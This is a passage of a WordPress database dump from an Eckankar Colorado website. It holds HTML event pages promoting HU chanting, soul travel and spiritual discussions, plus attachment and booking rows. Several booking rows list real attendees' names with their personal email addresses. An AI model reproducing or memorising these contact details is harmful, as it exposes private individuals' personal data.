why your life has so many seeming obstacles?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you ready to learn what life is teaching you through your problems?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore a new way of looking at your challenges, then this event is for you.</span></p>\r\n<blockquote class=\"\" style=\"border-style: solid; border-width: 0px 0px 0px 4px; box-shadow: #cecece 0px 0px 0px 0px inset; border-color: #1e63bc; line-height: 20px;\">\r\n<p class=\"mb-4\" style=\"line-height: 24px;\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>The Wonder Within You</em>:<br>\r\n<br>\r\n</span><span style=\"font-size: 14pt;\">\"Look at the obstacles in your life that you think are stumbling blocks - things that are holding you back. Now imagine the blocks becoming stepping-stones taking you higher. Where are they leading you? What are you learning about yourself?\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Live Streaming Event - ECK Light and Sound Service<br>\'Problems or Spiritual Lessons?\'- In Person','','publish','closed','closed','','live-streaming-event-eck-light-and-sound-serviceproblems-or-spiritual-lessons-in-person','','','2023-05-28 21:00:09','2023-05-29 03:00:09','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268565',0,'mec-events','',0),(268568,2,'2023-05-29 10:23:16','2023-05-29 16:23:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Problems or Spiritual Lessons?','','publish','closed','closed','','problems-or-spiritual-lessonsspiritual-discussion-in-person','','','2023-06-20 13:29:00','2023-06-20 19:29:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268568',0,'mec-events','',0),(268571,0,'2023-05-29 19:18:19','2023-05-30 01:18:19','','','','publish','closed','closed','','268571','','','2023-05-29 19:18:19','2023-05-30 01:18:19','',0,'https://eckankar-colorado.org/nf_sub/268571/',0,'nf_sub','',0),(268572,1000083,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Anitha Nakakena  - Antiasandsun@gmail.com','','publish','closed','closed','','anitha-nakakena-antiasandsungmail-com','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268572',0,'mec-books','',0),(268573,0,'2023-05-31 09:04:12','2023-05-31 15:04:12','','','','publish','closed','closed','','268573','','','2023-05-31 09:04:12','2023-05-31 15:04:12','',0,'https://eckankar-colorado.org/nf_sub/268573/',0,'nf_sub','',0),(268574,0,'2023-05-31 13:25:36','2023-05-31 19:25:36','','','','publish','closed','closed','','268574','','','2023-05-31 13:25:36','2023-05-31 19:25:36','',0,'https://eckankar-colorado.org/nf_sub/268574/',0,'nf_sub','',0),(268575,0,'2023-05-31 13:49:31','2023-05-31 19:49:31','','','','publish','closed','closed','','268575','','','2023-05-31 13:49:31','2023-05-31 19:49:31','',0,'https://eckankar-colorado.org/nf_sub/268575/',0,'nf_sub','',0),(268578,0,'2023-06-01 11:46:31','2023-06-01 17:46:31','','','','publish','closed','closed','','268578','','','2023-06-01 11:46:31','2023-06-01 17:46:31','',0,'https://eckankar-colorado.org/nf_sub/268578/',0,'nf_sub','',0),(269377,1000094,'2023-11-12 10:30:00','2023-11-12 17:30:00','','Jenny DeLapp Gallegos - jennydelapp@yahoo.com','','publish','closed','closed','','jenny-delapp-gallegos-jennydelappyahoo-com','','','2023-11-12 10:30:00','2023-11-12 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269377',0,'mec-books','',0),(269378,1000007,'2023-11-12 10:30:00','2023-11-12 17:30:00','','marc massengale - billybobak@yahoo.com','','publish','closed','closed','','marc-massengale-billybobakyahoo-com-3','','','2023-11-12 10:30:00','2023-11-12 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269378',0,'mec-books','',0),(269379,1000023,'2023-11-12 10:30:00','2023-11-12 17:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-11','','','2023-11-12 10:30:00','2023-11-12 17:30:00','',0,'https://eckankar-colorado.org/mec-books/bonnie-greenstreet-bngstreetgmail-com-11/',0,'mec-books','',0),(269380,1000095,'2023-11-12 10:30:00','2023-11-12 17:30:00','','Kim Stoltman - kbatty11@yahoo.com','','publish','closed','closed','','kim-stoltman-kbatty11yahoo-com','','','2023-11-12 10:30:00','2023-11-12 17:30:00','',0,'https://eckankar-colorado.org/mec-books/kim-stoltman-kbatty11yahoo-com/',0,'mec-books','',0),(269381,0,'2023-11-12 11:27:27','2023-11-12 18:27:27','','','','publish','closed','closed','','269381','','','2023-11-12 11:27:27','2023-11-12 18:27:27','',0,'https://eckankar-colorado.org/nf_sub/269381/',0,'nf_sub','',0),(269339,2,'2023-11-02 21:03:36','2023-11-03 03:03:36','','video-rebroadcast-lite-6','','inherit','closed','closed','','video-rebroadcast-lite-6','','','2023-11-02 21:03:36','2023-11-03 03:03:36','',269272,'https://eckankar-colorado.org/wp-content/uploads/2023/10/video-rebroadcast-lite-6.jpg',0,'attachment','image/jpeg',0),(269333,0,'2023-11-02 18:50:35','2023-11-03 00:50:35','','','','publish','closed','closed','','269333','','','2023-11-02 18:50:35','2023-11-03 00:50:35','',0,'https://eckankar-colorado.org/nf_sub/269333/',0,'nf_sub','',0),(269334,0,'2023-11-02 20:24:41','2023-11-03 02:24:41','','','','publish','closed','closed','','269334','','','2023-11-02 20:24:41','2023-11-03 02:24:41','',0,'https://eckankar-colorado.org/nf_sub/269334/',0,'nf_sub','',0),(269335,0,'2023-11-02 20:26:31','2023-11-03 02:26:31','','','','publish','closed','closed','','269335','','','2023-11-02 20:26:31','2023-11-03 02:26:31','',0,'https://eckankar-colorado.org/nf_sub/269335/',0,'nf_sub','',0),(269336,0,'2023-11-02 20:28:02','2023-11-03 02:28:02','','','','publish','closed','closed','','269336','','','2023-11-02 20:28:02','2023-11-03 02:28:02','',0,'https://eckankar-colorado.org/nf_sub/269336/',0,'nf_sub','',0),(269338,2,'2023-11-02 21:01:43','2023-11-03 03:01:43','','video-rebroadcast-7','','inherit','closed','closed','','video-rebroadcast-7','','','2023-11-02 21:01:43','2023-11-03 03:01:43','',269330,'https://eckankar-colorado.org/wp-content/uploads/2023/11/video-rebroadcast-7.jpg',0,'attachment','image/jpeg',0),(269342,15,'2023-11-04 08:38:04','2023-11-04 14:38:04','','SpiritualMeetingPlace','','inherit','closed','closed','','spiritualmeetingplace','','','2023-11-04 08:38:04','2023-11-04 14:38:04','',269340,'https://eckankar-colorado.org/wp-content/uploads/2023/11/SpiritualMeetingPlace.webp',0,'attachment','image/webp',0),(269343,0,'2023-11-04 09:18:00','2023-11-04 15:18:00','','','','publish','closed','closed','','269343','','','2023-11-04 09:18:00','2023-11-04 15:18:00','',0,'https://eckankar-colorado.org/nf_sub/269343/',0,'nf_sub','',0),(269344,0,'2023-11-04 09:18:43','2023-11-04 15:18:43','','','','publish','closed','closed','','269344','','','2023-11-04 09:18:43','2023-11-04 15:18:43','',0,'https://eckankar-colorado.org/nf_sub/269344/',0,'nf_sub','',0),(269346,0,'2023-11-04 10:03:52','2023-11-04 16:03:52','','','','publish','closed','closed','','269346','','','2023-11-04 10:03:52','2023-11-04 16:03:52','',0,'https://eckankar-colorado.org/nf_sub/269346/',0,'nf_sub','',0),(269350,2,'2023-11-04 11:31:34','2023-11-04 17:31:34','<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','NEW GROUP OF 3 CODE -- FINAL 11/01/2023','','publish','closed','closed','','new-group-of-3-code-final-11-01-2023','','','2023-11-04 11:31:34','2023-11-04 17:31:34','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=269350',0,'bg_block','',0),(268594,0,'2023-06-02 07:46:48','2023-06-02 13:46:48','','','','publish','closed','closed','','268594','','','2023-06-02 07:46:48','2023-06-02 13:46:48','',0,'https://eckankar-colorado.org/nf_sub/268594/',0,'nf_sub','',0),(268595,2,'2023-06-02 07:56:37','2023-06-02 13:56:37','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>PAST LIVES</strong>&nbsp;- learn to recall memories of past lives. Lessons of long ago can be recaptured now to help our lives today.<br>\r\n<br>\r\n</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>DREAMS</strong>&nbsp;- Dreams are real, another way to find wisdom from the heart. Dreams open new avenues of truth and give insights just for you.<br>\r\n<br>\r\n</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>SOUL TRAVEL</strong>&nbsp;- Learn to shift your consciousness to allow you to tap into the wisdom and knowledge of your own inner worlds. To fully, consciously ride the wave of divine love coming into our lives every day.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us in a 6-month spiritual discussion on past lives, dreams, and soul travel. We will meet on the 2nd Wednesday of the month at 6:30pm at the Parker Public Library. Free books will be available and there is no need to have the books ahead of time. You can join one of the classes or all of them.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The plan is to focus on a different aspect of these topics each month:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>May 10</strong> - You Have Lived Before - Remembering Past Lives</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>June 14</strong> - Past Lives, Present Lessons</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>July 12</strong> - Your Source for Everyday Guidance: A Spiritual View of Dreams</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>August 9</strong> - Gaining Insights through Spiritual Dream Exploration</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>September 13</strong> - Soul Travel: Learn to Shift Your Consciousness for a Better Life</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>October 11</strong> - Beyond Soul Travel: Being, Knowing, and Seeing</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/293885835/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives Dreams and Soul Travel<br>Book Discussion - In Person','','publish','closed','closed','','212','','','2023-06-02 10:53:28','2023-06-02 16:53:28','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268595',0,'mec-events','',0),(268599,0,'2023-06-03 16:52:47','2023-06-03 22:52:47','','','','publish','closed','closed','','268599','','','2023-06-03 16:52:47','2023-06-03 22:52:47','',0,'https://eckankar-colorado.org/nf_sub/268599/',0,'nf_sub','',0),(268869,2,'2023-08-02 10:38:17','2023-08-02 16:38:17','','soul-travel-2 souls-4','','inherit','closed','closed','','soul-travel-2-souls-4','','','2023-08-02 10:38:17','2023-08-02 16:38:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/08/soul-travel-2-souls-4.jpg',0,'attachment','image/jpeg',0),(268866,1000021,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Chris - choll.03@comcast.net','','publish','closed','closed','','chris-choll-03comcast-net','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268866',0,'mec-books','',0),(268867,1000021,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Chris2 - choll.03@comcast.net','','publish','closed','closed','','chris2-choll-03comcast-net','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268867',0,'mec-books','',0),(268868,1000021,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Chris3 - Choll.03@comcast.net','','publish','closed','closed','','chris3-choll-03comcast-net','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268868',0,'mec-books','',0),(268605,1000084,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Mollie - Molliesch@gmail.com','','publish','closed','closed','','mollie-mollieschgmail-com','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268605',0,'mec-books','',0),(268872,15,'2023-08-04 07:16:05','2023-08-04 13:16:05','','Dreams2','','inherit','closed','closed','','dreams2','','','2023-08-04 07:16:05','2023-08-04 13:16:05','',268871,'https://eckankar-colorado.org/wp-content/uploads/2023/08/Dreams2.webp',0,'attachment','image/webp',0),(268874,15,'2023-08-04 07:28:12','2023-08-04 13:28:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 18pt;\">Explore Soul Travel</span><br>\r\n</span></strong></span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Soul is multidimensional. It shares all the aspects of God. Soul can be everywhere at all times, and all places at the same time. This is that part of God that you are.&nbsp;</span><span style=\"font-size: 14pt;\">Begin remembering your dreams to get an idea of who and what you are as Soul.\" — Harold Klemp,&nbsp;<em>Touching the Face of God</em>, p. 22</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• What is Soul Travel and how is it experienced?</span><br>\r\n<span style=\"font-size: 14pt;\">• Is there a difference between imagination and what is real?</span><br>\r\n<span style=\"font-size: 14pt;\">• How does utilizing Soul Travel change our day-to-day life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to join in this open discussion and share your experiences or ask a related question that you may have. </span><span style=\"font-size: 14pt;\">Look for us in the hotel lobby with the Meetup sign. We are often seated in the back of the room.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more, visit <a href=\"https://www.eckankar.org/\">Eckankar</a></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/295050369/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How Do We Soul Travel?','','publish','closed','closed','','awaken-to-higher-consciousness-709-776','','','2023-08-04 07:28:12','2023-08-04 13:28:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268874',0,'mec-events','',0),(268875,15,'2023-08-04 07:25:13','2023-08-04 13:25:13','','SpiritualCity','','inherit','closed','closed','','spiritualcity','','','2023-08-04 07:25:13','2023-08-04 13:25:13','',268874,'https://eckankar-colorado.org/wp-content/uploads/2023/08/SpiritualCity.webp',0,'attachment','image/webp',0),(268876,15,'2023-08-04 07:36:03','2023-08-04 13:36:03','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 18pt;\">Open Your Heart and Spiritual Eye With The HU Mantra</span><br>\r\n</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>Tune into the Sound current with HU.</strong></em></span><br>\r\n<span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of </span><span style=\"font-size: 14pt;\">yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/294487250/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Passkey To Inner Worlds','','publish','closed','closed','','passkey-to-inner-worlds','','','2023-08-04 07:36:03','2023-08-04 13:36:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268876',0,'mec-events','',0),(268877,15,'2023-08-04 07:33:30','2023-08-04 13:33:30','','GoldenArches','','inherit','closed','closed','','goldenarches','','','2023-08-04 07:33:30','2023-08-04 13:33:30','',268876,'https://eckankar-colorado.org/wp-content/uploads/2023/08/GoldenArches.webp',0,'attachment','image/webp',0),(269165,0,'2023-10-04 19:20:27','2023-10-05 01:20:27','','','','publish','closed','closed','','269165','','','2023-10-04 19:20:27','2023-10-05 01:20:27','',0,'https://eckankar-colorado.org/nf_sub/269165/',0,'nf_sub','',0),(269166,0,'2023-10-04 19:22:32','2023-10-05 01:22:32','','','','publish','closed','closed','','269166','','','2023-10-04 19:22:32','2023-10-05 01:22:32','',0,'https://eckankar-colorado.org/nf_sub/269166/',0,'nf_sub','',0),(269171,0,'2023-10-05 22:33:51','2023-10-06 04:33:51','','','','publish','closed','closed','','269171','','','2023-10-05 22:33:51','2023-10-06 04:33:51','',0,'https://eckankar-colorado.org/nf_sub/269171/',0,'nf_sub','',0),(269172,0,'2023-10-06 09:17:50','2023-10-06 15:17:50','','','','publish','closed','closed','','269172','','','2023-10-06 09:17:50','2023-10-06 15:17:50','',0,'https://eckankar-colorado.org/nf_sub/269172/',0,'nf_sub','',0),(269173,0,'2023-10-06 10:45:51','2023-10-06 16:45:51','','','','publish','closed','closed','','269173','','','2023-10-06 10:45:51','2023-10-06 16:45:51','',0,'https://eckankar-colorado.org/nf_sub/269173/',0,'nf_sub','',0),(269174,0,'2023-10-07 10:31:07','2023-10-07 16:31:07','','','','publish','closed','closed','','269174','','','2023-10-07 10:31:07','2023-10-07 16:31:07','',0,'https://eckankar-colorado.org/nf_sub/269174/',0,'nf_sub','',0),(269175,1000023,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Bonnie Greenstreet  - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-10','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269175',0,'mec-books','',0),(269176,1000061,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Chukwuebuka Okwor - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-okwor-ocekenediliyahoo-com-3','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269176',0,'mec-books','',0),(268880,15,'2023-08-04 07:46:32','2023-08-04 13:46:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Why is This Happening, and How Can I Fix It?</span></strong></span></span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to get a higher perspective on life\'s challenges?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Do you wonder why your life has so many seeming obstacles?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you ready to learn what life is teaching you through your problems?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore a new way of looking at your challenges, then this book discussion is for you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>The Wonder Within You</em>, \"Look at the obstacles in your life that you think are stumbling blocks - things that are holding you back. Now imagine the blocks becoming stepping-stones taking you higher. Where are they leading you? What are you learning about yourself?\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span 